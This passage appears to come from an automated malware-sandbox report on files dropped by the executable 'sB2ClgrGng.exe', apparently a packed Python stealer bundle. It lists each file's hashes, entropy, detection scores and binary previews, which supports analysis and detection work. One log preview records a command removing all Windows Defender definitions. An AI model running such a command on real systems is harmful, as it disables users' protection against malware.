SHA-512:	062351EB7FCE291FA0206A5517B7EA95917E672CB3D0E5CCB49DB291D97B867410B5055D87F4612CB7A0F1BA305E05DFB414A99D8EDF0D5B889E26962C75E36F
Malicious:	false
Reputation:	unknown
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. S.u.n. .. O.c.t. .. 1.3. .. 2.0.2.4. .1.3.:.0.1.:.4.0.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. S.u.n. .. O.c.t. .. 1.3. .. 2.0.2.4. .1.3.:.0.1.:.4.0.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

C:\Users\user\AppData\Local\Temp\RESADCB.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Sun Oct 13 18:30:42 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1372
Entropy (8bit):	4.1098000463456925
Encrypted:	false
SSDEEP:	24:HSFq9s+fjnUDfHVwKefxFdYNII+ycuZhNsBakSPmPNnqS+d:ygjnSWKCzmu1ulWa3CqSe
MD5:	F299C6CF45F22A3A27497E678EB3AF97
SHA1:	45043954B891F1D97DA7B8F6763FC9833659043F
SHA-256:	EBF9EDD8C60D6694AA63F0A00BFFA34A5562EC649C9A2A88BD9DE4B4841784C4
SHA-512:	8BF52ED70BA677106D5977D195BD6614BCEE4073EA3DC2B2B01EC11A299C12D2856AE4502C8BF436983F27DF9022CD963F6A5677E0263B482200CBDE2D5677FF
Malicious:	false
Reputation:	unknown
Preview:	L......g.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........T....c:\Users\user\AppData\Local\Temp\tuy1nspn\CSC4CC439E8542640B1AC30792EC9E3F11A.TMP...............C.UL......u..Z.Z..........4.......C:\Users\user\AppData\Local\Temp\RESADCB.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.u.y.1.n.s.p.n...d.l.l.....(.....L.e.g.a.

C:\Users\user\AppData\Local\Temp\_MEI58162\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\Desktop\sB2ClgrGng.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	119192
Entropy (8bit):	6.6016214745004635
Encrypted:	false
SSDEEP:	1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
MD5:	BE8DBE2DC77EBE7F88F910C61AEC691A
SHA1:	A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
SHA-256:	4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
SHA-512:	0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.....cW.........." ...&. ...d......................................................-.....`A.........................................e..4...4m...........................O...........N..p............................L..@............0...............................text...&........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI58162\_bz2.pyd

Download File

Process:	C:\Users\user\Desktop\sB2ClgrGng.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	49944
Entropy (8bit):	7.795799692232421
Encrypted:	false
SSDEEP:	768:8A0qhtL6ugh0BoGmZ0zlTUjZomYtgHQmchmzmrCWJ7+pj0I1CV50e5YiSyvaPAM+:8AX76ZKBT+jjvQ+a7i0I1CV597Sy4x+R
MD5:	82E4F19C1E53EE3E46913D4DF0550AF7
SHA1:	283741406ECF64AB64DF1D6D46558EDD1ABE2B03
SHA-256:	78208DA0890AAFC68999C94AC52F1D5383EA75364EAF1A006D8B623ABE0A6BF0
SHA-512:	3FD8377D5F365499944A336819684E858534C8A23B8B24882F441318EC305E444E09125A0C0AEDC10E31DBF94DB60B8E796B03B9E36ADBAD37AB19C7724F36EE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................b....(......(......(......(......(.....................................................Rich...........PE..d......f.........." ...(............Pu....................................................`.............................................H....................0..D..................................................P...@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI58162\_ctypes.pyd

Download File

Process:	C:\Users\user\Desktop\sB2ClgrGng.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	60696
Entropy (8bit):	7.8378376093918645
Encrypted:	false
SSDEEP:	1536:OGd2xRPNLaGFQFjd9MuC8Hj0Lm3Uqy7OI1LPZV7SyVx1w5:FMxVhFyjd9MSmCxyKI1LPZV85
MD5:	FA360B7044312E7404704E1A485876D2
SHA1:	6EA4AAD0692C016C6B2284DB77D54D6D1FC63490
SHA-256:	F06C3491438F6685938789C319731DDF64BA1DA02CD71F43AB8829AF0E3F4E2F
SHA-512:	DB853C338625F3E04B01B049B0CB22BDAED4E785EB43696AEDA71B558F0F58113446A96A3E5356607335435EE8C78069CE8C1BCDB580D00FD4BAACBEC97A4B6A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......f.d."..."..."...+...$....... .......&.......*...........7... ...i...#...i...$.......!..."......7...$...7...#...7...#...7...#...Rich"...........................PE..d....f.........." ...(.....................................................P............`.........................................HL.......I.......@.......................L.......................................:..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@..............................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI58162\_decimal.pyd

Download File

Process:	C:\Users\user\Desktop\sB2ClgrGng.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	109848
Entropy (8bit):	7.940561307180843
Encrypted:	false
SSDEEP:	3072:6cS+IIb1vd3BENABrkfqWTpjXTZtMI1Oq37jY:6cLIIBvdRFmvFVtF7k
MD5:	B7012443C9C31FFD3AED70FE89AA82A0
SHA1:	420511F6515139DA1610DE088EAAAF39B8AAD987
SHA-256:	3B92D5CA6268A5AD0E92E5E403C621C56B17933DEF9D8C31E69AB520C30930D9
SHA-512:	EC422B0BEE30FD0675D38888F056C50CA6955788D89C2A6448DDC30539656995627CF548E1B3AA2C4A77F2349B297C466AF8942F8133EF4E2DFB706C8C1785E9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........V..............'.....g&......g&......g&......g&.......!.................9....!.......!.......!.......!K......!......Rich............PE..d.....f.........." ...(.p...................................................@............`..........................................<..P....9.......0...........&...........=.......................................*..@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc........0.......p..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI58162\_hashlib.pyd

Download File

Process:	C:\Users\user\Desktop\sB2ClgrGng.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36632
Entropy (8bit):	7.676180750303356
Encrypted:	false
SSDEEP:	768:qUJAxZoP6y3dGOWm6UZBtVupFD/I1OIcK5YiSyvLGAMxkEu:/mjOWHKBteD/I1OIcI7SyT0xq
MD5:	3A4A3A99A4A4ADAF60B9FAAF6A3EDBDA
SHA1:	A55EA560ACCD3B11700E2E2600DC1C6E08341E2F
SHA-256:	26EED7AAC1C142A83A236C5B35523A0922F14D643F6025DC3886398126DAE492
SHA-512:	CB7D298E5E55D2BF999160891D6239AFDC15ADA83CD90A54FDA6060C91A4E402909A4623DCAA9A87990F2AF84D6EB8A51E919C45060C5E90511CD4AADB1CDB36
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........N@.. ... ... ...... ..k!... ..k#... ..k$... ..k%... ..l!... ...!... ..h!... ...!.Y. ..l-... ..l ... ..l.... ..l"... .Rich.. .........................PE..d......f.........." ...(.P...........!.......................................@............`.........................................\|;..P....9.......0.......................;.......................................-..@...........................................UPX0....................................UPX1.....P.......P..................@....rsrc........0.......T..............@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI58162\_lzma.pyd

Download File

Process:	C:\Users\user\Desktop\sB2ClgrGng.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	88344
Entropy (8bit):	7.925560123137083
Encrypted:	false
SSDEEP:	1536:PRMIb+tRn8VHPoUBL9ZEL7qzf7+pW4AHjI1xhTkLtQtI1Z1i17SyQxw:+WgRsHPoUVwqzf7+mHjWxNsII1Z1i1b
MD5:	BAD668BBF4F0D15429F66865AF4C117B
SHA1:	2A85C44D2E6AA09CE6C11F2D548B068C20B7B7F8
SHA-256:	45B1FCDF4F3F97F9881AAA98B00046C4045B897F4095462C0BC4631DBADAC486
SHA-512:	798470B87F5A91B9345092593FC40C08AB36F1684EEE77654D4058B37B62B40EC0DEB4AC36D9BE3BB7F69ADFDF207BF150820CDBC27F98B0FA718EC394DA7C51
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D.3H%.`H%.`H%.`A]7`L%.`...aJ%.`...aK%.`...a@%.`...aD%.`]..aK%.`.].aJ%.`H%.`-%.`]..ar%.`]..aI%.`].[`I%.`]..aI%.`RichH%.`........................PE..d......f.........." ...(. ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI58162\_queue.pyd

Download File

Process:	C:\Users\user\Desktop\sB2ClgrGng.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26904
Entropy (8bit):	7.471995988275221
Encrypted:	false
SSDEEP:	768:uX+wITsyt4xW6QSp5vI1QUcp5YiSyv8+WAMxkEW7:1j4hpvI1QUc37SyIxC7
MD5:	326E66D3CF98D0FA1DB2E4C9F1D73E31
SHA1:	6ACE1304D4CB62D107333C3274E6246136AB2305
SHA-256:	BF6A8C5872D995EDAB5918491FA8721E7D1B730F66C8404EE760C1E30CB1F40E
SHA-512:	D7740693182040D469E93962792B3E706730C2F529AB39F7D9D7ADAB2E3805BB35D65DC8BB2BD264DA9D946F08D9C8A563342D5CB5774D73709AE4C8A3DE621C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7.\.V...V...V...."..V..5...V..5...V..5...V..5...V......V.......V...V...V......V......V....N..V......V..Rich.V..........................PE..d.....f.........." ...(.0.......... .....................................................`.............................................L.......P............`..............<....................................... ...@...........................................UPX0....................................UPX1.....0.......*..................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI58162\_socket.pyd

Download File

Process:	C:\Users\user\Desktop\sB2ClgrGng.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	45336
Entropy (8bit):	7.731477219829725
Encrypted:	false
SSDEEP:	768:BN6akbHvkpgRFeTWraC/YAapucnbp9b8I1Lw5Bqd5YiSyvFqMgAMxkE1Ei:B8akHrRFeTWrRtcnjb8I1Lw5BqD7Sy9C
MD5:	DA0DC29C413DFB5646D3D0818D875571
SHA1:	ADCD7ECD1581BCD0DA48BD7A34FECCADA0B015D6
SHA-256:	C3365AD1FEE140B4246F06DE805422762358A782757B308F796E302FE0F5AAF8
SHA-512:	17A0C09E2E18A984FD8FC4861397A5BD4692BCD3B66679255D74BB200EE9258FB4677B36D1EAA4BD650D84E54D18B8D95A05B34D0484BD9D8A2B6AB36FFFFCDB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...Nb}.Nb}.Nb}.6.}.Nb}g.c\|.Nb}g.a\|.Nb}g.f\|.Nb}g.g\|.Nb}..c\|.Nb}.Nc}.Nb}.6c\|.Nb}..o\|.Nb}..b\|.Nb}..}.Nb}..`\|.Nb}Rich.Nb}................PE..d......f.........." ...(.p...........q....................................................`.........................................D...P....................0.......................................................}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI58162\_sqlite3.pyd

Download File

Process:	C:\Users\user\Desktop\sB2ClgrGng.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	59160
Entropy (8bit):	7.856604012993883
Encrypted:	false
SSDEEP:	1536:e063sNIsNgSIOB2nMCbGV5SQpvX8bpJdRdTJq6I1OQJ+7Sy5/x19:eLHr4VD7dv81JdRdTJfI1OQJ+X9
MD5:	5F31F58583D2D1F7CB54DB8C777D2B1E
SHA1:	494587D2B9E993F2E5398D1C745732EF950E43B6
SHA-256:	FAD9FFCD3002CEC44C3DA9D7D48CE890D6697C0384B4C7DACAB032B42A5AC186
SHA-512:	8A4EC67D7AD552E8ADEA629151665F6832FC77C5D224E0EEFE90E3AEC62364A7C3D7D379A6D7B91DE0F9E48AF14F166E3B156B4994AFE7879328E0796201C8EA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........M..#..#..#.....#..1"..#..1..#..1 ..#..1'...#..1&..#..6"..#..."..#.."..#..6....#..6#..#..6..#..6!..#.Rich.#.........................PE..d......f.........." ...(.........p..`........................................@............`..........................................;..P....9.......0..........D............;......................................`&..@...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI58162\_ssl.pyd

Download File

Process:	C:\Users\user\Desktop\sB2ClgrGng.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	67864
Entropy (8bit):	7.846380784128584
Encrypted:	false
SSDEEP:	1536:ZF/9oW45eDk06nzOYL/arLU5fTWPLYuDmrFI1C7S1U7SyfoxS:Lv45eDH6yYL/QETWTY3BI1C7SmFd
MD5:	E33BF2BC6C19BF37C3CC8BAC6843D886
SHA1:	6701A61D74F50213B141861CFD169452DDE22655
SHA-256:	E3532D3F8C5E54371F827B9E6D0FEE175AD0B2B17E25C26FDFB4EFD5126B7288
SHA-512:	3526BCB97AD34F2E0C6894EE4CD6A945116F8AF5C20C5807B9BE877EB6EA9F20E571610D30D3E3B7391B23DDCD407912232796794277A3C4545CBCB2C5F8ED6F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........^..`...`...`......`./ia...`./ic...`./id...`./ie...`..na...`..ja...`...a.u.`...a...`..nm...`..n`...`..n....`..nb...`.Rich..`.........PE..d......f.........." ...(.........@.......P...................................0............`.........................................l,..d....)....... ..........P............,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip

Download File

Process:	C:\Users\user\Desktop\sB2ClgrGng.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1332769
Entropy (8bit):	5.586560217717372
Encrypted:	false
SSDEEP:	12288:VHlJGUqQlLmgBvc+fYNXPh26UZWAzyX7j7YQqPQCxi2hdmSPpHg1d6R1RbtRwv6:VHlJGUDa+zy/7UlZhdmSPNaQHtRwv6
MD5:	48BA559BF70C3EF963F86633530667D6
SHA1:	E3319E3A70590767AD00290230D77158F8F8307E
SHA-256:	F8377AA03B7036E7735E2814452C1759AB7CEEC3F8F8A202B697B4132809CE5E
SHA-512:	567A7BEF4A7C7FF0890708C0E62D2AF748B645C8B9071953873B0DD5AA789C42796860896A6B5E539651DE9A2243338E2A5FB47743C30DFCDE59B1787C4C1871
Malicious:	false
Reputation:	unknown
Preview:	PK..........!./gJ.O...O......._collections_abc.pyc......................................Z.....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.............Z...e.d.........Z.d...Z...e.e.........Z.[.g.d...Z.d.Z...e...e.d.................Z...e...e...e.........................Z...e...e.i.j%..........................................Z...e...e.i.j)..........................................Z...e...e.i.j-..........................................Z...e...e.g.................Z...e...e...e.g.........................Z...e...e...e.d.........................Z...e...e...e.d.d.z...........................Z...e...e...e.........................Z...e...e.d.................Z ..e...e.d.................Z!..e...e...e"........................Z#..e.i.j%..................................Z$..e.i.j)..................................Z%..e.i.j-..................................Z&..e.e.jN..........................Z(..e...d...................Z)d...Z..e........Z..e.e........Z+ejY............................[d...Z-..e-........

C:\Users\user\AppData\Local\Temp\_MEI58162\blank.aes

Download File

Process:	C:\Users\user\Desktop\sB2ClgrGng.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	119273
Entropy (8bit):	7.680998224539325
Encrypted:	false
SSDEEP:	1536:C9JWlPltDYDAMaUOIq5MYzHR05w9G6yyGZwbQGQXZSCDlhLxveiZUYEwCKpx:bEEMPWbHaB6NGmEtwa2Y1
MD5:	8CC6E7F8574FD30522EAB0EE12CEA595
SHA1:	9B3EF4E08B655E5464930FA80C6F859E79315AEB
SHA-256:	36C838F538976679170F3D3C99DBA733D9B9F8D49F731E1793FC70D528577638
SHA-512:	F66B637F369744F0C9C417A72325F4057B4F553D878CAE0005047C97C536A5EE4CFBC066E4D484E21D180D53D8D89B5F02DFB51E53FD506C1C48CE585B37FA5E
Malicious:	false
Reputation:	unknown
Preview:	PK........7u.Y\|Q..s...s.......stub-o.pyc.........H.f.*...............................e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z.d...Z.d.Z.....e...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j.......

C:\Users\user\AppData\Local\Temp\_MEI58162\bound.blank

Download File

Process:	C:\Users\user\Desktop\sB2ClgrGng.exe
File Type:	data
Category:	dropped
Size (bytes):	39512
Entropy (8bit):	7.992601002974843
Encrypted:	true
SSDEEP:	768:B5IFWxpEDUCrfDJx4A+nUYqcF5J42pTOpOslLCf4IUrkTx6VZH2Iq8:BWFWxpFCTgA+nUYqc3GyTOpOslLCf3U/
MD5:	3B38052473B872EAB684CF501BDFBD40
SHA1:	AB63DCE22A6023A623040D6C8E8949296CBB33C9
SHA-256:	807E211F1D6C83B2635FD5231F75526E1D864CC3659360C091DF6EB07F86D0A4
SHA-512:	1A28F0CCE1C9A8B4673C8FA0EC9B83A034A39DAE5A966A958957D7D5E59057DA92C3A375135D49F2BFB9DDAF0D60E880C4F09B15B9640057E4FDFFDC2263089D
Malicious:	false
Reputation:	unknown
Preview:	..=[....\|......m..,..!.y8.OD.R./.t~.v'.=5.x.#..i..7-...V.w:..-F..;f.....k..'..;e..`....I]-u`.X..L......+-...(.y..._.E....1.Q..o...nl..z.j..A......U.....i....A.5.f.....w\[.{f....#.........W..f....v.6....[.....c[...l.....0\5....%.i.G....r...O....<~9.sM....>./.......\h.u....q.<.Nv..V.d....V..E...i......w...YX?...Ib.l...S.A.G....(.N.wy[..$....`Z.l.<.?e...B.....g...?./.b..p...#..f../.p/\|.R.^..{..M/.oc...a.azR.Y.^8.;.......+.....D].....W......:m..I..)[V.R&..........._........!:.ED.._D...H.w.)...Lu_../.Z........N8=.)..4s.EYq...Z......D.\...<.z.*.x...l/.H....A.....L..fH..k...~D.l.{.\.....[plCa....$..q.4!C.....l.!.)!.H....4....o.I].47..M...2.2M.8..l....%.n."..I..T.!.....m..{.....1{...=..<v".>eE.7C.;..Z.4.+...S_.....2..a......$..pS.`H9d{>....)nL.@.=..X...h..y.XF...x2..S....-...b4.y.l.\|..[..LM(a.[.}..../wA..j.L2.). ..A.8R.W.FW....B.4.z.9;..c.....j..]T/.]......_...{s.0B...A....iz.+@..=.P.. ............J..<DF.9n..~."P.>...z...k...

C:\Users\user\AppData\Local\Temp\_MEI58162\libcrypto-3.dll

Download File

Process:	C:\Users\user\Desktop\sB2ClgrGng.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1635096
Entropy (8bit):	7.95287803315892
Encrypted:	false
SSDEEP:	49152:z6H83HeiR86t/czBf6Y1z8kq5HaMpW/9nn3nL/obN1CPwDvt3uFlDCP:z6c3CFFz8BBpWtbU1CPwDvt3uFlDCP
MD5:	7F1B899D2015164AB951D04EBB91E9AC
SHA1:	1223986C8A1CBB57EF1725175986E15018CC9EAB
SHA-256:	41201D2F29CF3BC16BF32C8CECF3B89E82FEC3E5572EB38A578AE0FB0C5A2986
SHA-512:	CA227B6F998CACCA3EB6A8F18D63F8F18633AB4B8464FB8B47CAA010687A64516181AD0701C794D6BFE3F153662EA94779B4F70A5A5A94BB3066D8A011B4310D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...m..l...i..l...h..l...o..l..m.y.l...m...l...o..l...h.l...l..l......l...n..l.Rich.l.........PE..d......e.........." ...%.0........9.`.O...9...................................R...........`......................................... .P......P.h.....P.......K.d............R..................................... .O.@...........................................UPX0......9.............................UPX1.....0....9..0..................@....rsrc.........P......4..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI58162\libffi-8.dll

Download File

Process:	C:\Users\user\Desktop\sB2ClgrGng.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	29968
Entropy (8bit):	7.677818197322094
Encrypted:	false
SSDEEP:	768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
MD5:	08B000C3D990BC018FCB91A1E175E06E
SHA1:	BD0CE09BB3414D11C91316113C2BECFFF0862D0D
SHA-256:	135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
SHA-512:	8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI58162\libssl-3.dll

Download File

Process:	C:\Users\user\Desktop\sB2ClgrGng.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	228120
Entropy (8bit):	7.928688904391487
Encrypted:	false
SSDEEP:	6144:Gmlccqt6UmyaQeUV1BXKtS68fp2FagXlk2:l+t6Ce6XKtSHYomk2
MD5:	264BE59FF04E5DCD1D020F16AAB3C8CB
SHA1:	2D7E186C688B34FDB4C85A3FCE0BEFF39B15D50E
SHA-256:	358B59DA9580E7102ADFC1BE9400ACEA18BC49474DB26F2F8BACB4B8839CE49D
SHA-512:	9ABB96549724AFFB2E69E5CB2C834ECEA3F882F2F7392F2F8811B8B0DB57C5340AB21BE60F1798C7AB05F93692EB0AEAB077CAF7E9B7BB278AD374FF3C52D248
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>:V.PiV.PiV.Pi_..iX.PiC.QhT.Pi..QhT.PiC.UhZ.PiC.Th^.PiC.ShR.PillQhU.PiV.QiH.PillThf.PillPhW.Pill.iW.PillRhW.PiRichV.Pi................PE..d......e.........." ...%.....P...p...m....................................................`............................................,C......8...............@M...................................................y..@...........................................UPX0.....p..............................UPX1................................@....rsrc....P.......L..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI58162\python312.dll

Download File

Process:	C:\Users\user\Desktop\sB2ClgrGng.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1809176
Entropy (8bit):	7.993595793951616
Encrypted:	true
SSDEEP:	49152:Ef2ZN5YIMku2u+Nh2bgCuBa2PB3lF3gKqKPZGL:EuZfW2u+N81YDPB3nXy
MD5:	EB02B8268D6EA28DB0EA71BFE24B15D6
SHA1:	86F723FCC4583D7D2BD59CA2749D4B3952CD65A5
SHA-256:	80222651A93099A906BE55044024D32E93B841C83554359D6E605D50D11E2E70
SHA-512:	693BBC3C896AD3C6044C832597F946C778E6C6192DEF3D662803E330209EC1C68D8D33BD82978279AE66B264A892A366183DCEF9A3A777E0A6EE450A928268E2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D..Z%..Z%..Z%......X%....e.T%......^%......R%......W%..S]..@%...]..Q%..Z%..*$..O....%..O...[%..O.g.[%..O...[%..RichZ%..........PE..d......f.........." ...(..........P..[k...P..................................Pl...........`.........................................H.k.d....yk......pk......._.`I...........Ll. ............................gk.(....gk.@...........................................UPX0......P.............................UPX1..........P.....................@....rsrc........pk.....................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

